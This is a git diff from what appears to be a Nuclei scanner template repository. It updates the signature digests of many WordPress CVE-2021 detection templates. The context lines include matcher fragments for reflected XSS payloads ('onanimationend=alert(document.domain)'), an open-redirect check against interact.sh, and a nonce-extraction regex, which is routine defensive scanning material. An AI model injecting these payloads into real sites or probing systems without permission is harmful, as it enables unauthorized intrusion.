490a0046304402206afa99df22230016448a0b9e4364d9a635e1c8fd7cfd72660a762d448cbd4f5d0220095bfe68aa3b132862d07e4ef9a816e4cb65bbaa068d0625b536a97b43d87319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200575304b0ca1fd82762a4b1bc0c0a5d5b244a315bd63f8004e8db16bd8d1f1fc02206b3654fb54253371be74e5cdac57397e6cc470b4f377948ed8fb497124959b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index c012723a81..eb533a4f7a 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -80,4 +80,4 @@ http: regex: - BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"}; internal: true -# digest: 4a0a00473045022100b8c26489e388600ed7392126a0d96153b15b0ad02bfc879d7e47473dcb14fa9e022041508bc27c2a5f188b6cd39a606c2be97099960ee8d30c9ddb535a3a22f9a31c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202980c96a383b4abd6b6e44e2a5aca197c62f96e5890c3c1335360e6005d3231f022100ecc147b3206725ac54bad8c600987c11fa5fed45b3c1c672d4bc69f60b3e3db2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index a39285a954..63863368dc 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -55,4 +55,4 @@ http: - 'status_code_2 == 302' - "contains(header_2, 'Location: https://interact.sh?client_id=1')" condition: and -# digest: 4a0a00473045022100dbe91ea50dd379c515d3eee6699a845d148a111391c7303db2a193b9eda920ea022061e3ec8779c027810f1f1f1cba44c0df3db63590a5d0808e1bb4ee5e8ee9f522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036d05431f76855b89b0da70e963f8e4f8394936622f12ddaf2f4a6a96ea31036022100eebcaa6bef0d88f2de6f10a79cb3f763510f67efa22171def7588205f57bcb67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index d9df5c85cd..5e7087e5f4 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da1d2590e32aeae01e9bde72dd44c3ec2cb17e57cc94120918a61f0ef4bc138a0220221f43062ec121f78c5630d30a32390327483712c7f64e0d182dec57735cbc88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b132df86455d7d46118d1ab9516eddcdea01b4c1e73951ec495b7206f349ba2102202d08cb67853496c5be35d48810a49ee60d844b3f10e39b4311b7f58035aecc9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 7cb5374bc0..34fd189987 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f2a3d9930e0fde5f6bcb71f2c59eaa85e3572ed307c67a7640172e0be08f3d120220271fec82e3f65b2c757047deeacf4c68ee53c11fa6c9a162278ebe28b34d057e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097abf31f4d9f5a9eff2f9fc9afd139f1d4f801ad11b7faafb35be9000783d4ec0221009a7dcd615fad2244184ba7593fec2380193559b77d7fea9366d3801bffdbb82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index 8c8b87d6b4..73efc6c5c8 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and -# digest: 4b0a00483046022100b6ba39eb8c10b2c00f154fb9e06a3f16a51818ba25a713f46b224ae78b7b08e3022100f9a70545d94a0a5654a19de02b7fd4bd02a03739783bf7ef65553e5d9e73f069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a8a84ebfc9a3e87cf2dd0d79f4712c7789eb2901960846c182d91cdb024eca810220178f9acb7d3f8040a0470799fe5599e0fff6338d2ef49148f527868a5166e0be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index b533c5a11d..90079b24aa 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210090ca2103de92b6dc25a7618c9abed634103005d683a53f856c42ba94a6d88eda022100c4061d8c2c0bc0e219d5e22b3780c15279f520a86a6e3d0ca34b0626cadaabec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204bafa2422479bf5575ebd9ed6a966a85a18d7754805fb39a7832d440f10808ec022100ddfc9f78fadeb5ad3d709fa7865983da067f3cc644d9fd2b353153edde82f990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 330d2df197..57d3162701 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -54,4 +54,4 @@ http: - 'status_code == 200' - 'contains(body, "") && contains(body, "invitaion-code-table")' condition: and -# digest: 4b0a00483046022100b99a39f4abdc6dca07eb7f5ab3dd7fe8111515935493a27d4ee44ae0d090e72d022100a5016274628bb830de4aa3f88794468720b50096965f9e1b4df30029b75c3885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc813864a3856748a3f6df4825141b5e8d943b2dbcd51a877b78612ef4d43108022007893dc29f5096e4bb9118fb0f5bacb6f280a3e41bada7e9f6ec6393b2a45382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index 74ea297e4d..e5b2d1e556 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205917ffa809c11d9c309949d353c16ced2a39b5fd1efa927f718b4e5c1d418c1a022100ec4e71ee4005aad1c859c0a7b7b336bae761807d52ac3733efd04804c3764719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097dd1f7fcebf86a0fcaecd1bf15e2c6b0e6db620590d47d75351b93805eed46b022100ad98f6cc7386320986e25063f5544dc501af7214a40c6e666ea67a8abdc54a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index f8e7a46e4e..28a264ed4b 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201e2ceeffc6debc4a9f2bcab33c299f89ea8f059834bcadd14ed1ce12254f7638022100e939c158d51778be923e5bda4ff02bdb8fb85e3f133afd6508d7c1c9547eb485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078bfe56b29fdae4e784a090f01eadd6ef3612e50f877cb491b89a20d7b6fecf8022100efdf5c6cd949d65a790d991d24b0ac4d6b629ad05c5c974025a93fa73f1df04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index aaef829355..c10b2668bd 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc5ae696a3713e5efe99907c2c5316b86c4f55c217dfe61338fc36f6c3879dc002204f97750378dd8bb6166a795ddb6f7f0b7013314c8985d1232d49854a8f34f942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c974866130fde17ddd398b2b05cabc0d5cc7b88d033ec49799978b0f36546bb02206398d07cab401ea1a276f5861fe5003399071e0b3133dde3e3d1536842cf3c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index afe318f210..cf802e9792 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -77,4 +77,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f0e469315d27c1e2b10e7997e7bd0501633f74806e35bf505925a7267a1eaee502204bacf6f2af3b3841aea43702a619a936d0ddcde2bd2b41be0be741e4f77e6778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009371b523b1669469a857beaef1aa7cca089b04c5d3732af0838ecace130ab63a022100c53721068f94d8eaf4bf7473ffe743182b72091aef3768ae7efb13d76f3e5080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 02ebb005ba..0b5a2ff363 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203e2a4280ee0651e5647945e4903da98fa98c222ddd7b9235a6d9438e3485841402206d0d38add1a01e0032859c32ec3152b0a8ceaece887c99aa97f955a93b804c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004db7135a047debadba42090caf41877c817496c5f91d819a25664765f404243022100c7f072cc93eb446a6d2aa59fb975679f6656a5249d26cd027511d97026985dee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index f1d11e905d..21ce8354fc 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100934bf7080b3d93a65ddd9caff54bd309aa1d8788dc598dd103b6357cdfb57011022014bb7403e7c0e8b16169d4a25120d2dc0dae91f23747101e193be8c8125c3ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e0029e147c3b61ff7495678e15338bd1660203b966692600c6f0886299091dc0220229649bf196d8af651ae787c24d6294f2d5bbd36bb4ba4f5dbe836f1580e88f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 12b553a08d..ad09e6ded9 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022014722415f9ae063b808bcd4ac28d7a9b396691db69e28476da39b6334b500023022100e8bd3f1af2ba25ea96591e2a83134dcc3dd5f659df9340e6bd61b8e03c14c069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d472ae886d175f694e0cfafe9d668f88ff1b38bae7943734a4e75dbc0447b890220082aa5747ce07f79d8d20a3ce9eff6fdcbba088740b15b84028488b917844523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index 7e0481e720..d9d04697f3 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206ee5628010c7f23879f3e1a01c1890305b99db8d3cc1cb2718617cb2ef30780e02202b639a37a1dd866da6c94bfc1fe3d592d5ea367c2c3f2c31e551a20a425eaea9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4e8be43e99a9e6d5311edc2c540304fe2d1809a7fe5d8a486dcf9bdfaf9069b02202d9efbcba7c02352b2ebbb960d45931ad6bf71b99bc47a932b7bdce4ddb97acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 46d9da3c92..39c1dd22aa 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -56,4 +56,4 @@ http: - 'status_code_2 == 500' - 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")' condition: and -# digest: 490a0046304402205dcef0e1060bf6410f8ccc51b6dc60108a61f504af5607a66e0bfd3cb395781e022018998b666ed53f82c15af12788cdc956d84f2304b15fd173d3be1f38b1a19c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f81cc6ae63a3716745a9d2b7b36392e91421d0e2429ef59ea0be12290d02643302204e0b0cd1ce6bc440c4c53e079c3bc7406fc60f36b6f79cf10bce774aee58942d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 94806a58d2..a0dbc74ac8 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220698e69643ac31b2c0e4dc76eb0b904ce125dfe060203e3ab4768f00d20ef8f30022100a531cb557e30a01d688ad9803cada5532b7663e3bab4bccf9eb8d9f2c76e1b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f2ce74ef4a7ea71764275ea3c3ee212cac05745c6ea47d9a8f8f6a87479ff14022016b66e79aa34eca598bd78013beabc45c11ee49fa6e999c254a4247a180d474a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 2f0647816b..1e27fc177a 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b0c692d7f7fa8aecd2a0875cfbb10abcb21fd710aca2b36e29f1734b928142f022006cacf7134c58b067595e9ae0db5668660eae1fe56cdbc1df62c4b28f244bc25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203688e56140b338049b30eba454917aeffb2bef2c53c32f592a21501c9852e382022100b708e26ccf5ecc0eddeeb510f8ba93157940119a90dc5778dd04ac1885862d42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index f3e050b2da..746f70537c 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f6ed5d60c3d6fca4ea545a03f032d233384e4f202567758cc149f6ae9027fa0b0220774c944fc42cfeb9f74d77f0c613d54501ce5801e8b14c88c28ce9dc8bd6d38a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026013638289841b0141cfeba8dccecc1dab0d9a476e8540fa28f49272e8dfb6002201d0d3214f2467c1ba748ee2e23e29393e96e3ab193a168dcb955e432dad49f92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index 7835c492da..33b369f63d 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a876f00fdc3eb21c7cf5e9e9c5227ff39b40d55af7669f205a6def322179eefb02202ba5e17e0f6a3f89085d5e0b0cb91635833014c28a5395d68a513213a0787da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe8ca74000ee931b31e74f3d1cddf17a2e83f6cb35f2638b0493e1fc1c35986c022100d8d79ebfe8b3a19da5a6ebf6fe4a9db8fc83ceb7e647e68e438c03966e2f2ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index 30b6e323b1..14b4222580 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Leave A Review?")' - 'contains(body_2, "onanimationend=alert(document.domain)")' condition: and -# digest: 4b0a00483046022100f3b6393f38c382ea7ce0abcf70deef44f182fcd4065ccf2fad781fc835d80a0f0221009809a88c0d01b87cd8335a7a367389737021ea22bbaca6405ab5864aca886c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207aac4efba33e2b09d9bbf39474feaff043d2a75a9ca47ae85c0cddee60672ad9022100c953cd30b41e2d6bc5db518515121724770226dc1e2f176dec8f26e57b570f05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index 5bb7e4cdda..7c58ab2792 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -48,4 +48,4 @@ http: - 'status_code == 200' - 'contains_all(body, "{\"answer_name", "vote\":")' condition: and -# digest: 4a0a004730450220400950d0fa75587a1672ab2651c5f2359b6e2e562a8e976b14a0c3df14ea75af022100d7140a8c7c94b358b4ce33d56a2ab711aabe08fd44109c2983364d553c4527e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203414f57b4fe1500e69a1e44d86edb4c318855b78e1113d2423dd48e3a6931a04022100f3d562735c04bf9943dbdfb808ebfa20790e58f4c6f5643d8c89eb10e12c69e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 07062bfc71..36045800d7 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb4dede60cbd650ce97bfda0fa91b7f8370e06af577abd3c80b68b8b317218b002201e412b7c8e92f85dcbe03843c685bd8b1901b503ba7e1205e582a81f7966aeef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff4af5fe386f25a59e70aebc0300f2b32e5dadd6155fb4f896c4a5bee4c59d8e0221008137a7de9307580126e7f1f120331c42a9c1b7778a82aff3fe2990418d4e4db7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index 2d534bc76e..4cc2812375 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008622e207c9f0ca1114e5c6a581d6366e8af3b5123dcf60107685cf3a2fc5e87d02206a27d7c55a4b02d222f9740a6009fdc11aa7d94d4b5eba63538b574577c9d148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb808dfd1917b49c08da176851217326fc26bd2b57aa4b7c8266bf160e792fbc02202a9ea44d9ac554f4a165da05b4f42f1d219213c8bb93469eb5aa13dc5f176c8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index c1c1d4401a..7925cbc88c 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "asgarosforum")' condition: and -# digest: 4a0a0047304502204abd65cd69b3643e17793039bcb1df79c03f29ed1e031e0ae09f57d30b48a2eb022100cb2c0863ead3cbed3b58da963a5fe5581155c01b4aebcc1a1bbfc5404a1a6a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0bde1de52443d3ddd17e9f337ab1944196721460c9f115b112be0cae1ccf101022100ea65d1cc352cc3a866999d55ce3fe60120bf86c60e25d1b34ce21d6e1997a677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index f6f47c2c33..2eb2ddf359 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -68,4 +68,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4b0a00483046022100adaf3f6dbade14a8363e77bf12c0cea329147bc2403931be1388051547c74e0f022100a0df347fa16ec48be9b13ad6a97de3bfb8d0d15be7b11f4797ef9cd4278c394a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 41fed7d518..1866dd8bb3 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -70,4 +70,4 @@ http: - type: kval kval: - version -# digest: 490a0046304402206ea3f3423d4068dd6ed2c0c60b4b97e5add71418527dc2067a8afeacfba7936502207434fc75eab6c206bf2e9194b2c4891776e633f7d22f0cdb4ed36ffabbf0a748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202623889f6a04d4102a3ee41ca9948d2142f9f84fa0da1e8ef8ffcd628e93656102202e85312c8ea957f1764523d65a51f68b8df842f32c4367f338da6dd2c1fe2a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index 21af45d464..a732c82be7 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022021e03802b55f2eb84ef9a04bcd3faf25c0e6e1aa7b5f5f1219b885c12debbaff0221009f117cd73568a12faad8e3a4e9a6e0bdb4d0ce5ef3413b62bb2a0f10db515323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100925f187ad76f5f8365e3f1a88cb5ab33bbd47b807a54ca6165322a2bc5bc0f6002204ab2f9cae5d3b5e7047b7c8da488e19b688adafc42f315b6d05a095d75220323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index a2a24f1ae2..8e3f4b39e3 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "Please enter the email you registered with")' condition: and -# digest: 4a0a00473045022015bcdf20ae52f30c13798d586e5d521ea0573919ad1d39d94d38ea91d834e80f02210092253fe3526a65605c2e2b2b4ff6d134a3007c85663f8e9536ed0a719e91915e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100baf26aa77d293a650d638df6fa36214c0344ec2c80457d29c0cec194f81aa415022100ab4c0c9979d914df0d42b4b1c65aae34aff3194e9127bdf1aa5c9d1fed8fdf11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 862ef67636..9380fffb1a 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' condition: and -# digest: 4a0a00473045022100d6856e294174b5d9dc89185a9c240281456650c3f4eeb59816c9a51b1ca9517302203a40995842fd40ce5b2cc4200bb0f904d6f6f581d80c0a5616f0f17ab83251be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e8536955856d9bc9a5a5aedf2add2d924db939e93cd887ac1a5e4e227088d61d02202645c295b7d581f78d64b60f9e76d2f0be6da9051a9df4f594c9a68ad508c81e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 18d189136f..8e0f897c51 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009940ed970e2fe98caebdb9000bae9afc4290524e778cb754f7a1bbab62a0cca5022100d07f577257ea8cd109f810bd9f0cbbe6a15f7c41569e27c4b31bec75455d0ce0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063f1fb7f3c537ef2d85ee381fe59d12ff8a7573951532288c6ee00f35c13cbe00221008adb49d3082f36e62cf862b159abfcd412ce9aeb7bbccb8a793595df1050212e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 2a760c7a44..735827f021 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5acc9465e15b102954f10f7359ee1bc2f84794775d4ede6b9a7068b41f88775022100a6c201acb8e3d859ec1fd6dbf27d7df311de39ca11129dabdfef9954a4fc6f30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c82f86dcd3e8b4a15e3ddea6f2679ac006399a334f94d29004e7c499a456647c02207d7a1d690acd371e2575c5a5890894ee0a0e3ca1c7507d8e83c613349a67ec41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index eb1f17b011..938a9f5557 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e300910d515c6736720a43f88bd07fb9e8fe55dfb9476cd2cbcc4c09c1296d6a022100bcc84f726d27a269aa1bc67d9b8f62a6107064085fc4a8f16be9d7a11ae4db38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d059a073432b2e7d721f4330fb2d2ba43b5530a405ea4b215609aebce4f87711022100dea7ef65540f1e462b0bb20f2401adea6888adb3b21b7399da1887889123e1a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index eab573e463..b66c619a65 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "custom-facebook-feed")' condition: and -# digest: 4a0a00473045022100fa83a00697d269b6cdd964481b903dd4b5069d5728458b99b869b47d6ee1e7ba0220698974fb740ad266961d030e116bfe683009ce16c756a3e4cd82db8ede877d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220593222ee799a5a57bbca1f91ef1d82b078dafe58bc1504b76de5639af201be7a0220391577796da3e6269252434319c495679b5ca5967eb2076afb48b698d5f4884a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index aaa35575d3..3489526798 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b07e30b60813be07ad6a2b28ad020bb7afc7e921992d672cc8cfd26e37ccddd502203e41c21853075160cd1331bf8021e9aa97b5a5a9987ea23114fc44e42121ed46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 